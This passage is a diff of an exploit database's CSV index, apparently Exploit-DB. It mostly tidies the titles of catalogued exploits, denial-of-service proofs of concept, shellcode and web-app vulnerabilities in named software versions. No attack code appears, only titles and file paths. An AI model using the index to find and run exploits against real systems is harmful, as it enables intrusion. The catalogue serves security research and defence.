Attendence Managnmnet Hardware[MIPS] 2 - Improper Authentication",2010-03-20,fb1h2s,hardware,remote,0 11823,platforms/cgi/webapps/11823.txt,"Trouble Ticket Software - ttx.cgi Remote File Download",2010-03-20,n01d,cgi,webapps,0 11824,platforms/php/webapps/11824.py,"Woltlab Burning Board Teamsite Hack 3.0 - ts_other.php SQL Injection",2010-03-21,"Easy Laster",php,webapps,0 @@ -10846,7 +10846,7 @@ id,file,description,date,author,platform,type,port 11852,platforms/php/webapps/11852.txt,"Xataface - Admin Authentication Bypass",2010-03-23,Xinapse,php,webapps,0 11853,platforms/php/webapps/11853.txt,"Joomla! Component SMEStorage - Local File Inclusion",2010-03-23,"Chip d3 bi0s",php,webapps,0 11855,platforms/multiple/dos/11855.c,"Jinais IRC Server 0.1.8 - Null Pointer (PoC)",2010-03-23,"Salvatore Fresta",multiple,dos,0 -11856,platforms/multiple/remote/11856.txt,"uhttp Server - Directory Traversal",2010-03-23,"Salvatore Fresta",multiple,remote,0 +11856,platforms/multiple/remote/11856.txt,"uhttp Server 0.1.0-alpha - Directory Traversal",2010-03-23,"Salvatore Fresta",multiple,remote,0 11857,platforms/windows/remote/11857.c,"MX Simulator Server - Remote Buffer Overflow (PoC)",2010-03-23,"Salvatore Fresta",windows,remote,0 11861,platforms/windows/dos/11861.pl,"Smart PC Recorder 4.8 - '.mp3' Local Crash (PoC)",2010-03-24,chap0,windows,dos,0 11862,platforms/php/webapps/11862.txt,"Easy-Clanpage 2.0 - Blind SQL Injection",2010-03-24,"Easy Laster",php,webapps,0 @@ -10862,7 +10862,7 @@ id,file,description,date,author,platform,type,port 11874,platforms/php/webapps/11874.txt,"INVOhost - SQL Injection",2010-03-25,"Andrés Gómez",php,webapps,0 11875,platforms/php/webapps/11875.py,"Easy-Clanpage 2.01 - SQL Injection",2010-03-25,"Easy Laster",php,webapps,0 11876,platforms/php/webapps/11876.txt,"justVisual 2.0 - 'index.php' Local File Inclusion",2010-03-25,eidelweiss,php,webapps,0 -11877,platforms/windows/remote/11877.py,"eDisplay Personal FTP server 1.0.0 - Multiple Authenticated Stack Buffer Overflow (2)",2010-03-25,sud0,windows,remote,21 +11877,platforms/windows/remote/11877.py,"eDisplay Personal FTP Server 1.0.0 - Multiple Authenticated Stack Buffer Overflow (2)",2010-03-25,sud0,windows,remote,21 11878,platforms/windows/dos/11878.py,"Cisco TFTP Server 1.1 - Denial of Service",2010-03-25,_SuBz3r0_,windows,dos,69 11879,platforms/windows/remote/11879.txt,"SAP GUI 7.00 - BExGlobal Active-X unsecure method",2010-03-25,"Alexey Sintsov",windows,remote,0 11880,platforms/hardware/dos/11880.txt,"Lexmark Multiple Laser printers - Remote Stack Overflow",2010-03-25,"Francis Provencher",hardware,dos,0 @@ -11003,7 +11003,7 @@ id,file,description,date,author,platform,type,port 12041,platforms/php/webapps/12041.txt,"Solutive CMS - SQL Injection",2010-04-04,"Th3 RDX",php,webapps,0 12042,platforms/php/webapps/12042.txt,"x10 mirco blogging 121 - SQL Injection",2010-04-04,ITSecTeam,php,webapps,0 12043,platforms/php/webapps/12043.html,"Prediction League 0.3.8 - Cross-Site Request Forgery (Add Admin)",2010-04-04,indoushka,php,webapps,0 -12044,platforms/windows/remote/12044.c,"Easy Ftp Server 1.7.0.2 - MKD Remote Authenticated Buffer Overflow",2010-04-04,x90c,windows,remote,0 +12044,platforms/windows/remote/12044.c,"EasyFTP Server 1.7.0.2 - MKD Remote Authenticated Buffer Overflow",2010-04-04,x90c,windows,remote,0 12045,platforms/php/webapps/12045.html,"MunkyScripts Simple Gallery - SQL Injection",2010-04-04,ITSecTeam,php,webapps,0 12047,platforms/php/webapps/12047.html,"nodesforum 1.033 - Remote File Inclusion",2010-04-04,ITSecTeam,php,webapps,0 12048,platforms/php/webapps/12048.html,"ttCMS 5.0 - Remote File Inclusion",2010-04-04,ITSecTeam,php,webapps,0 @@ -11372,7 +11372,7 @@ id,file,description,date,author,platform,type,port 12454,platforms/php/webapps/12454.txt,"Zyke CMS 1.0 - Arbitrary File Upload",2010-04-29,indoushka,php,webapps,0 12455,platforms/php/webapps/12455.txt,"Ucenter Projekt 2.0 - Insecure crossdomain (Cross-Site Scripting)",2010-04-29,indoushka,php,webapps,0 12456,platforms/php/webapps/12456.txt,"chCounter - indirect SQL Injection / Cross-Site Scripting",2010-04-29,Valentin,php,webapps,0 -12457,platforms/windows/dos/12457.txt,"Apple Safari 4.0.3 (Windows x86) - (Windows x86) CSS Remote Denial of Service",2010-04-29,ITSecTeam,windows,dos,0 +12457,platforms/windows/dos/12457.txt,"Apple Safari 4.0.3 (Windows x86) - CSS Remote Denial of Service",2010-04-29,ITSecTeam,windows,dos,0 12458,platforms/php/webapps/12458.txt,"Scratcher - (SQL Injection / Cross-Site Scripting) Multiple Remote",2010-04-29,"cr4wl3r ",php,webapps,0 12459,platforms/php/webapps/12459.txt,"ec21 clone 3.0 - 'id' SQL Injection",2010-04-30,v3n0m,php,webapps,0 12460,platforms/php/webapps/12460.txt,"B2B Gold Script - 'id' SQL Injection",2010-04-30,v3n0m,php,webapps,0 @@ -11505,8 +11505,8 @@ id,file,description,date,author,platform,type,port 14364,platforms/php/webapps/14364.html,"eXtreme Message Board 1.9.11 - Multiple Cross-Site Request Forgery Vulnerabilities",2010-07-15,10n1z3d,php,webapps,0 12601,platforms/php/webapps/12601.txt,"Joomla! Component JE Job - Local File Inclusion",2010-05-14,Valentin,php,webapps,0 12602,platforms/windows/dos/12602.txt,"Mozilla Firefox 3.6.3 / Safari 4.0.5 - Access Violation Exception and Unknown Exception",2010-05-14,"Fredrik Nordberg Almroth",windows,dos,0 -12603,platforms/windows/dos/12603.py,"SmallFTPd FTP Server 1.0.3 - DELE Command Denial of Service",2010-05-14,"Jeremiah Talamantes",windows,dos,0 -12604,platforms/windows/dos/12604.py,"TYPSoft FTP Server 1.10 - RETR Command Denial of Service",2010-05-14,"Jeremiah Talamantes",windows,dos,0 +12603,platforms/windows/dos/12603.py,"SmallFTPd 1.0.3 - DELE Command Denial of Service",2010-05-14,"Jeremiah Talamantes",windows,dos,0 +12604,platforms/windows/dos/12604.py,"TYPSoft FTP Server 1.10 - 'RETR' Command Denial of Service",2010-05-14,"Jeremiah Talamantes",windows,dos,0 12605,platforms/windows/dos/12605.html,"IncrediMail - 'ImShExtU.dll' ActiveX Memory Corruption",2010-05-14,Lincoln,windows,dos,0 12606,platforms/asp/webapps/12606.txt,"SelfComposer CMS - SQL Injection",2010-05-14,Locu,asp,webapps,0 12607,platforms/php/webapps/12607.txt,"Joomla! Component com_jequoteform - Local File Inclusion",2010-05-14,"ALTBTA ",php,webapps,0 @@ -11580,7 +11580,7 @@ id,file,description,date,author,platform,type,port 28128,platforms/php/webapps/28128.txt,"CMS Mini 0.2.2 - Multiple Vulnerabilities",2013-09-06,SANTHO,php,webapps,80 12679,platforms/windows/webapps/12679.txt,"3Com* iMC (Intelligent Management Center) - Unauthenticated File Retrieval (Traversal)",2010-05-21,"Richard Brain",windows,webapps,0 12680,platforms/windows/webapps/12680.txt,"3Com* iMC (Intelligent Management Center) - Cross-Site Scripting / Information Disclosure Flaws",2010-05-21,"Richard Brain",windows,webapps,0 -12683,platforms/windows/dos/12683.pl,"SolarWinds 10.4.0.10 - TFTP Denial of Service",2010-05-21,Nullthreat,windows,dos,69 +12683,platforms/windows/dos/12683.pl,"SolarWinds TFTP Server 10.4.0.10 - Denial of Service",2010-05-21,Nullthreat,windows,dos,69 12684,platforms/php/webapps/12684.txt,"ConPresso 4.0.7 - SQL Injection",2010-05-21,Gamoscu,php,webapps,0 12686,platforms/php/webapps/12686.txt,"Online University - (Authentication Bypass) SQL Injection",2010-05-21,"cr4wl3r ",php,webapps,0 12687,platforms/windows/dos/12687.pl,"WinDirectAudio 1.0 - '.wav' (PoC)",2010-05-21,ahwak2000,windows,dos,0 @@ -11610,7 +11610,7 @@ id,file,description,date,author,platform,type,port 12712,platforms/php/webapps/12712.txt,"goffgrafix - Design's - SQL Injection",2010-05-23,XroGuE,php,webapps,0 12713,platforms/php/webapps/12713.txt,"eCreo - SQL Injection",2010-05-23,cyberlog,php,webapps,0 12714,platforms/php/webapps/12714.txt,"infoware - SQL Injection",2010-05-24,cyberlog,php,webapps,0 -12715,platforms/multiple/webapps/12715.pl,"e107 - Code Exec",2010-05-24,McFly,multiple,webapps,0 +12715,platforms/multiple/webapps/12715.pl,"e107 - Code Exection",2010-05-24,McFly,multiple,webapps,0 12716,platforms/php/webapps/12716.txt,"runt-communications Design - 'property_more.php' SQL Injection",2010-05-24,CoBRa_21,php,webapps,0 12717,platforms/php/webapps/12717.txt,"Telia Web Design - 'index.php' SQL Injection",2010-05-24,CoBRa_21,php,webapps,0 12718,platforms/php/webapps/12718.txt,"BBMedia Design's - 'news_more.php' SQL Injection",2010-05-24,gendenk,php,webapps,0 @@ -11658,7 +11658,7 @@ id,file,description,date,author,platform,type,port 12771,platforms/php/webapps/12771.txt,"Toronja CMS - HTML / Cross-Site Scripting Injection",2010-05-27,CoBRa_21,php,webapps,0 12772,platforms/php/webapps/12772.txt,"Realtor WebSite System E-Commerce - SQL Injection",2010-05-27,cyberlog,php,webapps,0 12773,platforms/php/webapps/12773.txt,"Realtor Real Estate Agent - (idproperty) SQL Injection",2010-05-28,v3n0m,php,webapps,0 -12774,platforms/windows/dos/12774.py,"HomeFTP Server r1.10.3 (build 144) - Denial of Service",2010-05-28,Dr_IDE,windows,dos,0 +12774,platforms/windows/dos/12774.py,"Home FTP Server r1.10.3 (build 144) - Denial of Service",2010-05-28,Dr_IDE,windows,dos,0 12775,platforms/multiple/dos/12775.py,"VideoLAN VLC Media Player 1.0.6 - '.avi' Media File Crash (PoC)",2010-05-28,Dr_IDE,multiple,dos,0 12776,platforms/php/webapps/12776.txt,"Realtor WebSite System E-Commerce - idfestival SQL Injection",2010-05-28,CoBRa_21,php,webapps,0 12777,platforms/php/webapps/12777.txt,"Realtor Real Estate Agent - 'news.php' SQL Injection",2010-05-28,v3n0m,php,webapps,0 @@ -11991,7 +11991,7 @@ id,file,description,date,author,platform,type,port 13503,platforms/unixware/shellcode/13503.txt,"UnixWare - execve /bin/sh Shellcode (95 bytes)",2004-09-26,K2,unixware,shellcode,0 13504,platforms/win_x86/shellcode/13504.asm,"Windows 5.0 < 7.0 x86 - Null Free bindshell port 28876 Shellcode",2009-07-27,Skylined,win_x86,shellcode,0 13505,platforms/win_x86/shellcode/13505.c,"Win32/XP SP2 (EN) - cmd.exe Shellcode (23 bytes)",2009-07-17,Stack,win_x86,shellcode,0 -18615,platforms/windows/dos/18615.py,"TYPSoft FTP Server 1.1 - Remote Denial of Service (APPE)",2012-03-17,"brock haun",windows,dos,0 +18615,platforms/windows/dos/18615.py,"TYPSoft FTP Server 1.1 - 'APPE' Remote Denial of Service",2012-03-17,"brock haun",windows,dos,0 18593,platforms/php/webapps/18593.txt,"ModX 2.2.0 - Multiple Vulnerabilities",2012-03-14,n0tch,php,webapps,0 18594,platforms/php/webapps/18594.txt,"Simple Posting System - Multiple Vulnerabilities",2012-03-14,n0tch,php,webapps,0 13507,platforms/win_x86/shellcode/13507.txt,"Win32 - SEH omelet Shellcode",2009-03-16,Skylined,win_x86,shellcode,0 @@ -12199,7 +12199,7 @@ id,file,description,date,author,platform,type,port 13833,platforms/php/webapps/13833.txt,"Parallels System Automation (PSA) - Local File Inclusion",2010-06-11,"Pouya Daneshmand",php,webapps,0 13834,platforms/windows/remote/13834.html,"Sygate Personal Firewall 5.6 build 2808 - ActiveX with DEP Bypass",2010-06-11,Lincoln,windows,remote,0 13835,platforms/php/webapps/13835.txt,"DaLogin 2.2 - 'FCKeditor' Arbitrary File Upload",2010-06-11,eidelweiss,php,webapps,0 -13836,platforms/windows/dos/13836.py,"SolarWinds 10.4.0.13 - Denial of Service",2010-06-12,Nullthreat,windows,dos,0 +13836,platforms/windows/dos/13836.py,"SolarWinds TFTP Server 10.4.0.13 - Denial of Service",2010-06-12,Nullthreat,windows,dos,0 13837,platforms/windows/dos/13837.pl,"Media Player Classic 1.3.1774.0 - (mpcpl) Local Denial of Service (PoC)",2010-06-12,R3d-D3V!L,windows,dos,0 13838,platforms/windows/dos/13838.pl,"CP3 Studio PC Version - Denial of Service",2010-06-12,chap0,windows,dos,0 13840,platforms/asp/webapps/13840.txt,"VU Case Manager - Authentication Bypass",2010-06-12,"L0rd CrusAd3r",asp,webapps,0 @@ -12480,7 +12480,7 @@ id,file,description,date,author,platform,type,port 14182,platforms/windows/remote/14182.py,"HP OpenView NNM - getnnmdata.exe CGI Invalid Hostname Remote Code Execution",2010-07-02,"S2 Crew",windows,remote,80 14192,platforms/asp/webapps/14192.txt,"Ziggurat Farsi CMS - SQL Injection",2010-07-03,"Arash Saadatfar",asp,webapps,0 14184,platforms/php/webapps/14184.txt,"SweetRice < 0.6.4 - 'FCKeditor' Arbitrary File Upload",2010-07-03,ITSecTeam,php,webapps,0 -14185,platforms/multiple/dos/14185.py,"ISC-DHCPD - Denial of Service",2010-07-03,sid,multiple,dos,0 +14185,platforms/multiple/dos/14185.py,"ISC DHCPD - Denial of Service",2010-07-03,sid,multiple,dos,0 14191,platforms/windows/local/14191.pl,"ASX to MP3 Converter 3.1.2.1 - Local Buffer Overflow (SEH)",2010-07-03,Madjix,windows,local,0 14186,platforms/php/webapps/14186.txt,"Family Connections Who is Chatting AddOn - Remote File Inclusion",2010-07-03,lumut--,php,webapps,0 14187,platforms/php/webapps/14187.txt,"Joomla! Component eventcal 1.6.4 com_eventcal - Blind SQL Injection",2010-07-03,RoAd_KiLlEr,php,webapps,0 @@ -12653,10 +12653,10 @@ id,file,description,date,author,platform,type,port 14397,platforms/windows/local/14397.rb,"MoreAmp - Buffer Overflow (SEH) (Metasploit)",2010-07-17,Madjix,windows,local,0 14404,platforms/php/webapps/14404.txt,"Kayako eSupport 3.70.02 - 'functions.php' SQL Injection",2010-07-18,ScOrPiOn,php,webapps,0 14405,platforms/php/webapps/14405.txt,"PHP-Fusion - Remote Command Execution",2010-07-18,"ViRuS Qalaa",php,webapps,0 -14399,platforms/windows/remote/14399.py,"Easy FTP Server 1.7.0.11 - Authenticated 'MKD' Command Remote Buffer Overflow",2010-07-17,"Karn Ganeshen",windows,remote,0 -14400,platforms/windows/remote/14400.py,"Easy FTP Server 1.7.0.11 - Authenticated 'LIST' Command Remote Buffer Overflow",2010-07-17,"Karn Ganeshen",windows,remote,0 +14399,platforms/windows/remote/14399.py,"EasyFTP Server 1.7.0.11 - Authenticated 'MKD' Command Remote Buffer Overflow",2010-07-17,"Karn Ganeshen",windows,remote,0 +14400,platforms/windows/remote/14400.py,"EasyFTP Server 1.7.0.11 - Authenticated 'LIST' Command Remote Buffer Overflow",2010-07-17,"Karn Ganeshen",windows,remote,0 14401,platforms/asp/webapps/14401.txt,"ClickAndRank Script - Authentication Bypass",2010-07-18,walid,asp,webapps,0 -14402,platforms/windows/remote/14402.py,"Easy FTP Server 1.7.0.11 - Authenticated 'CWD' Command Remote Buffer Overflow",2010-07-18,fdiskyou,windows,remote,0 +14402,platforms/windows/remote/14402.py,"EasyFTP Server 1.7.0.11 - Authenticated 'CWD' Command Remote Buffer Overflow",2010-07-18,fdiskyou,windows,remote,0 14403,platforms/windows/local/14403.txt,"Microsoft Windows - Automatic LNK Shortcut File Code Execution",2010-07-18,Ivanlef0u,windows,local,0 14406,platforms/bsd/local/14406.pl,"Ghostscript - '.PostScript' File Stack Overflow",2010-07-18,"Rodrigo Rubira Branco",bsd,local,0 14407,platforms/aix/remote/14407.c,"rpc.pcnfsd - Remote Format String",2010-07-18,"Rodrigo Rubira Branco",aix,remote,0 @@ -12696,7 +12696,7 @@ id,file,description,date,author,platform,type,port 14448,platforms/php/webapps/14448.txt,"Joomla! Component com_golfcourseguide) 0.9.6.0 (Beta) / 1 (Beta - SQL Injection",2010-07-23,Valentin,php,webapps,0 14449,platforms/php/webapps/14449.txt,"Joomla! Component com_huruhelpdesk - SQL Injection",2010-07-23,Amine_92,php,webapps,0 14450,platforms/php/webapps/14450.txt,"Joomla! Component com_iproperty - SQL Injection",2010-07-23,Amine_92,php,webapps,0 -14451,platforms/windows/remote/14451.rb,"Easy FTP Server 1.7.0.11 - Authenticated 'LIST' Command Remote Buffer Overflow (Metasploit)",2010-07-23,"Muhamad Fadzil Ramli",windows,remote,0 +14451,platforms/windows/remote/14451.rb,"EasyFTP Server 1.7.0.11 - Authenticated 'LIST' Command Remote Buffer Overflow (Metasploit)",2010-07-23,"Muhamad Fadzil Ramli",windows,remote,0 14452,platforms/linux/dos/14452.txt,"FTP Client 0.17-19build1 ACCT (Ubuntu 10.04) - Buffer Overflow",2010-07-23,d0lc3,linux,dos,0 14453,platforms/php/webapps/14453.txt,"PhotoPost PHP 4.6.5 - (ecard.php) SQL Injection",2010-07-23,CoBRa_21,php,webapps,0 14454,platforms/php/webapps/14454.txt,"ValidForm Builder script - Remote Command Execution",2010-07-23,"HaCkEr arar",php,webapps,0 @@ -12822,7 +12822,7 @@ id,file,description,date,author,platform,type,port 14620,platforms/windows/dos/14620.py,"RightMark Audio Analyzer 6.2.3 - Denial of Service",2010-08-11,"Oh Yaw Theng",windows,dos,0 14621,platforms/windows/dos/14621.py,"Abac Karaoke 2.15 - Denial of Service",2010-08-11,"Oh Yaw Theng",windows,dos,0 14622,platforms/php/webapps/14622.txt,"KnowledgeTree 3.5.2 Community Edition - Permanent Cross-Site Scripting",2010-08-11,fdiskyou,php,webapps,0 -14623,platforms/windows/remote/14623.py,"Easy FTP Server 1.7.0.11 - Authenticated Multiple Commands Remote Buffer Overflow",2010-08-11,"Glafkos Charalambous ",windows,remote,21 +14623,platforms/windows/remote/14623.py,"EasyFTP Server 1.7.0.11 - Authenticated Multiple Commands Remote Buffer Overflow",2010-08-11,"Glafkos Charalambous ",windows,remote,21 14624,platforms/windows/dos/14624.py,"JaMP Player 4.2.2.0 - Denial of Service",2010-08-12,"Oh Yaw Theng",windows,dos,0 14625,platforms/windows/dos/14625.py,"CombiWave Lite 4.0.1.4 - Denial of Service",2010-08-12,"Oh Yaw Theng",windows,dos,0 14628,platforms/win_x86/webapps/14628.txt,"PHP-Nuke 8.1 SEO Arabic - Remote File Inclusion",2010-08-12,LoSt.HaCkEr,win_x86,webapps,80 @@ -12939,7 +12939,7 @@ id,file,description,date,author,platform,type,port 14773,platforms/windows/local/14773.c,"Adobe Illustrator CS4 - 'aires.dll' DLL Hijacking Exploit",2010-08-25,"Glafkos Charalambous ",windows,local,0 14774,platforms/windows/local/14774.c,"Cisco Packet Tracer 5.2 - (wintab32.dll) DLL Hijacking Exploit",2010-08-25,CCNA,windows,local,0 14775,platforms/windows/local/14775.c,"Adobe InDesign CS4 - 'ibfs32.dll' DLL Hijacking Exploit",2010-08-25,"Glafkos Charalambous ",windows,local,0 -14779,platforms/windows/remote/14779.pl,"deepin tftp server 1.25 - Directory Traversal",2010-08-25,demonalex,windows,remote,0 +14779,platforms/windows/remote/14779.pl,"Deepin TFTP Server 1.25 - Directory Traversal",2010-08-25,demonalex,windows,remote,0 14778,platforms/windows/local/14778.c,"Microsoft Windows Contacts - 'wab32res.dll' DLL Hijacking Exploit",2010-08-25,storm,windows,local,0 14780,platforms/windows/local/14780.c,"Microsoft Windows Internet Communication Settings - 'schannel.dll' DLL Hijacking Exploit",2010-08-25,ALPdaemon,windows,local,0 14781,platforms/windows/local/14781.c,"Roxio MyDVD 9 - 'HomeUtils9.dll' DLL Hijacking Exploit",2010-08-25,storm,windows,local,0 @@ -12994,7 +12994,7 @@ id,file,description,date,author,platform,type,port 14854,platforms/php/webapps/14854.py,"Cpanel PHP - Restriction Bypass",2010-09-01,Abysssec,php,webapps,0 14851,platforms/php/webapps/14851.txt,"dompdf 0.6.0 beta1 - Remote File Inclusion",2010-09-01,Andre_Corleone,php,webapps,0 14852,platforms/windows/dos/14852.txt,"LeadTools ActiveX common dialogs 16.5 - Multiple Vulnerabilities",2010-09-01,LiquidWorm,windows,dos,0 -14853,platforms/windows/remote/14853.py,"Adobe Acrobat Reader and Flash Player - 'newclass' invalid pointer",2010-09-01,Abysssec,windows,remote,0 +14853,platforms/windows/remote/14853.py,"Adobe Acrobat Reader and Flash Player - 'newclass' Invalid Pointer Exploit",2010-09-01,Abysssec,windows,remote,0 14870,platforms/asp/webapps/14870.txt,"rainbowportal - Multiple Vulnerabilities",2010-09-02,Abysssec,asp,webapps,0 14856,platforms/windows/remote/14856.txt,"TFTPDWIN 0.4.2 - Directory Traversal",2010-09-01,chr1x,windows,remote,0 14857,platforms/windows/remote/14857.txt,"tftp desktop 2.5 - Directory Traversal",2010-09-01,chr1x,windows,remote,0 @@ -13256,7 +13256,7 @@ id,file,description,date,author,platform,type,port 15593,platforms/php/webapps/15593.html,"Cpanel 11.x - Cross-Site Request Forgery (Edit E-mail)",2010-11-21,"Mon7rF .",php,webapps,0 15594,platforms/php/webapps/15594.txt,"AuraCMS - 'pfd.php' SQL Injection",2010-11-22,"Don Tukulesto",php,webapps,0 15595,platforms/php/webapps/15595.txt,"jSchool Advanced - Blind SQL Injection",2010-11-22,"Don Tukulesto",php,webapps,0 -15596,platforms/jsp/webapps/15596.txt,"JCMS 2010 - file download",2010-11-22,Beach,jsp,webapps,0 +15596,platforms/jsp/webapps/15596.txt,"JCMS 2010 - File Download Exploit",2010-11-22,Beach,jsp,webapps,0 15597,platforms/asp/webapps/15597.txt,"Acidcat CMS 3.3 - 'FCKeditor' Arbitrary File Upload",2010-11-22,Net.Edit0r,asp,webapps,0 15598,platforms/windows/dos/15598.pl,"Xion Audio Player 1.0.126 - '.m3u8' Buffer Overflow",2010-11-23,anT!-Tr0J4n,windows,dos,0 15599,platforms/windows/local/15599.py,"Xion Audio Player 1.0.127 - '.m3u' Buffer Overflow",2010-11-23,0v3r,windows,local,0 @@ -13683,7 +13683,7 @@ id,file,description,date,author,platform,type,port 15747,platforms/windows/local/15747.py,"Aesop GIF Creator 2.1 - '.aep' Buffer Overflow",2010-12-16,xsploitedsec,windows,local,0 15748,platforms/php/webapps/15748.txt,"QualDev eCommerce script - SQL Injection",2010-12-16,ErrNick,php,webapps,0 15749,platforms/php/webapps/15749.txt,"Joomla! Component JRadio (com_jradio) - Local File Inclusion",2010-12-16,Sid3^effects,php,webapps,0 -15750,platforms/windows/dos/15750.py,"SolarFTP 2.0 - Multiple Commands Denial of Service",2010-12-16,modpr0be,windows,dos,0 +15750,platforms/windows/dos/15750.py,"Solar FTP Server 2.0 - Multiple Commands Denial of Service",2010-12-16,modpr0be,windows,dos,0 15751,platforms/windows/local/15751.pl,"Altarsoft Audio Converter 1.1 - Buffer Overflow (SEH)",2010-12-16,"C4SS!0 G0M3S",windows,local,0 15752,platforms/php/webapps/15752.txt,"Softbiz PHP Joke Site Software - Multiple SQL Injections",2010-12-17,v3n0m,php,webapps,0 15753,platforms/hardware/webapps/15753.html,"D-Link DIR-300 - Cross-Site Request Forgery (Change Admin Account Settings)",2010-12-17,outlaw.dll,hardware,webapps,0 @@ -13779,7 +13779,7 @@ id,file,description,date,author,platform,type,port 15855,platforms/windows/local/15855.py,"Digital Music Pad 8.2.3.4.8 - '.pls' SEH Overflow",2010-12-29,"Abhishek Lyall",windows,local,0 15857,platforms/php/webapps/15857.txt,"Discovery TorrentTrader 2.6 - Multiple Vulnerabilities",2010-12-29,EsS4ndre,php,webapps,0 15858,platforms/php/webapps/15858.txt,"WordPress 3.0.3 - Persistent Cross-Site Scripting (Internet Explorer 6/7 NS8.1)",2010-12-29,Saif,php,webapps,0 -15860,platforms/windows/dos/15860.py,"TYPSoft FTP Server 1.10 - RETR CMD Denial of Service",2010-12-29,emgent,windows,dos,0 +15860,platforms/windows/dos/15860.py,"TYPSoft FTP Server 1.10 - 'RETR' Command Denial of Service",2010-12-29,emgent,windows,dos,0 15861,platforms/windows/remote/15861.txt,"httpdasm 0.92 - Directory Traversal",2010-12-29,"John Leitch",windows,remote,0 15862,platforms/windows/remote/15862.txt,"quickphp Web server 1.9.1 - Directory Traversal",2010-12-29,"John Leitch",windows,remote,0 15863,platforms/php/webapps/15863.txt,"lightneasy 3.2.2 - Multiple Vulnerabilities",2010-12-29,"High-Tech Bridge SA",php,webapps,0 @@ -13807,7 +13807,7 @@ id,file,description,date,author,platform,type,port 15898,platforms/multiple/dos/15898.py,"Wireshark - ENTTEC DMX Data RLE Buffer Overflow",2011-01-03,"non-customers crew",multiple,dos,0 15902,platforms/php/webapps/15902.html,"S40 CMS 0.4.1 - Cross-Site Request Forgery (Change Admin Password)",2011-01-04,pentesters.ir,php,webapps,0 15901,platforms/windows/local/15901.py,"Music Animation Machine MIDI Player - Buffer Overflow (SEH)",2011-01-04,Acidgen,windows,local,0 -15905,platforms/windows/dos/15905.py,"Xynph 1.0 - USER Denial of Service",2011-01-04,freak_out,windows,dos,0 +15905,platforms/windows/dos/15905.py,"Xynph FTP Server 1.0 - USER Denial of Service",2011-01-04,freak_out,windows,dos,0 15991,platforms/windows/remote/15991.html,"Real Networks RealPlayer SP - 'RecordClip' Method Remote Code Execution",2011-01-14,"Sean de Regge",windows,remote,0 15907,platforms/php/webapps/15907.txt,"Nucleus 3.61 - Multiple Remote File Inclusion",2011-01-05,n0n0x,php,webapps,0 15913,platforms/php/webapps/15913.pl,"PhpGedView 4.2.3 - Local File Inclusion",2011-01-05,dun,php,webapps,0 @@ -13991,7 +13991,7 @@ id,file,description,date,author,platform,type,port 16166,platforms/windows/dos/16166.py,"Microsoft Windows 2003 - AD Unauthenticated BROWSER ELECTION Remote Heap Overflow",2011-02-14,Cupidon-3005,windows,dos,0 16148,platforms/php/webapps/16148.txt,"SourceBans 1.4.7 - Cross-Site Scripting",2011-02-09,Sw1tCh,php,webapps,0 16149,platforms/hardware/remote/16149.txt,"Linksys WAP610N - Unauthenticated Root Access Security",2011-02-10,"Matteo Ignaccolo",hardware,remote,0 -16150,platforms/windows/dos/16150.py,"XM Easy Personal FTP Server 5.8.0 - (TYPE) Denial of Service",2011-02-10,"Houssam Sahli",windows,dos,0 +16150,platforms/windows/dos/16150.py,"XM Easy Personal FTP Server 5.8.0 - 'TYPE' Denial of Service",2011-02-10,"Houssam Sahli",windows,dos,0 16152,platforms/multiple/webapps/16152.py,"LocatePC 1.05 (Ligatt Version + Others) - SQL Injection",2011-02-10,anonymous,multiple,webapps,0 16153,platforms/windows/local/16153.py,"MoviePlay 4.82 - '.lst' Buffer Overflow",2011-02-11,sickness,windows,local,0 16154,platforms/php/webapps/16154.txt,"Horde - Horde_Image::factory driver Argument Local File Inclusion",2011-02-11,skysbsb,php,webapps,0 @@ -14016,7 +14016,7 @@ id,file,description,date,author,platform,type,port 16181,platforms/php/webapps/16181.txt,"WordPress Plugin User Photo Component - Arbitrary File Upload",2011-02-17,ADVtools,php,webapps,0 16182,platforms/linux/dos/16182.txt,"PHP 5.3.5 - grapheme_extract() Null Pointer Dereference",2011-02-17,"Maksymilian Arciemowicz",linux,dos,0 16193,platforms/windows/dos/16193.pl,"Avira AntiVir QUA file - (avcenter.exe) Local Crash (PoC)",2011-02-19,KedAns-Dz,windows,dos,0 -16204,platforms/windows/dos/16204.pl,"Solar FTP 2.1 - Denial of Service",2011-02-22,x000,windows,dos,0 +16204,platforms/windows/dos/16204.pl,"Solar FTP Server 2.1 - Denial of Service",2011-02-22,x000,windows,dos,0 16190,platforms/windows/dos/16190.pl,"IBM Lotus Domino LDAP - Bind Request Remote Code Execution",2011-02-18,"Francis Provencher",windows,dos,0 16191,platforms/windows/dos/16191.pl,"Novell ZenWorks 10 / 11 - TFTPD Remote Code Execution",2011-02-18,"Francis Provencher",windows,dos,0 16192,platforms/linux/dos/16192.pl,"Novell Iprint - LPD Remote Code Execution",2011-02-18,"Francis Provencher",linux,dos,0 @@ -14035,7 +14035,7 @@ id,file,description,date,author,platform,type,port 16205,platforms/asp/webapps/16205.txt,"DIY Web CMS - Multiple Vulnerabilities",2011-02-22,p0pc0rn,asp,webapps,0 16206,platforms/php/webapps/16206.txt,"Galilery 1.0 - Local File Inclusion",2011-02-22,lemlajt,php,webapps,0 16207,platforms/php/webapps/16207.txt,"dotProject 2.1.5 - Multiple Vulnerabilities",2011-02-22,lemlajt,php,webapps,0 -16216,platforms/linux/dos/16216.txt,"Red Hat Linux - stickiness of /tmp",2011-02-23,"Tavis Ormandy",linux,dos,0 +16216,platforms/linux/dos/16216.txt,"Red Hat Linux - stickiness of /tmp Exploit",2011-02-23,"Tavis Ormandy",linux,dos,0 16208,platforms/ios/remote/16208.txt,"iOS FtpDisc 1.0 - Directory Traversal",2011-02-22,"R3d@l3rt_ Sp@2K_ Sunlight",ios,remote,0 16209,platforms/ios/remote/16209.txt,"iOS SideBooks 1.0 - Directory Traversal",2011-02-22,"R3d@l3rt_ Sp@2K_ Sunlight",ios,remote,0 16222,platforms/php/webapps/16222.txt,"course registration management system 2.1 - Multiple Vulnerabilities",2011-02-23,"AutoSec Tools",php,webapps,0 @@ -14074,7 +14074,7 @@ id,file,description,date,author,platform,type,port 16255,platforms/windows/dos/16255.pl,"Magic Music Editor - '.cda' Denial of Service",2011-02-28,"AtT4CKxT3rR0r1ST ",windows,dos,0 16256,platforms/php/webapps/16256.txt,"DO-CMS - Multiple SQL Injections",2011-02-28,"AtT4CKxT3rR0r1ST ",php,webapps,0 16257,platforms/php/webapps/16257.txt,"SnapProof - 'page.php' SQL Injection",2011-02-28,"AtT4CKxT3rR0r1ST ",php,webapps,0 -16259,platforms/windows/remote/16259.txt,"home ftp server 1.12 - Directory Traversal",2011-02-28,clshack,windows,remote,0 +16259,platforms/windows/remote/16259.txt,"Home FTP Server 1.12 - Directory 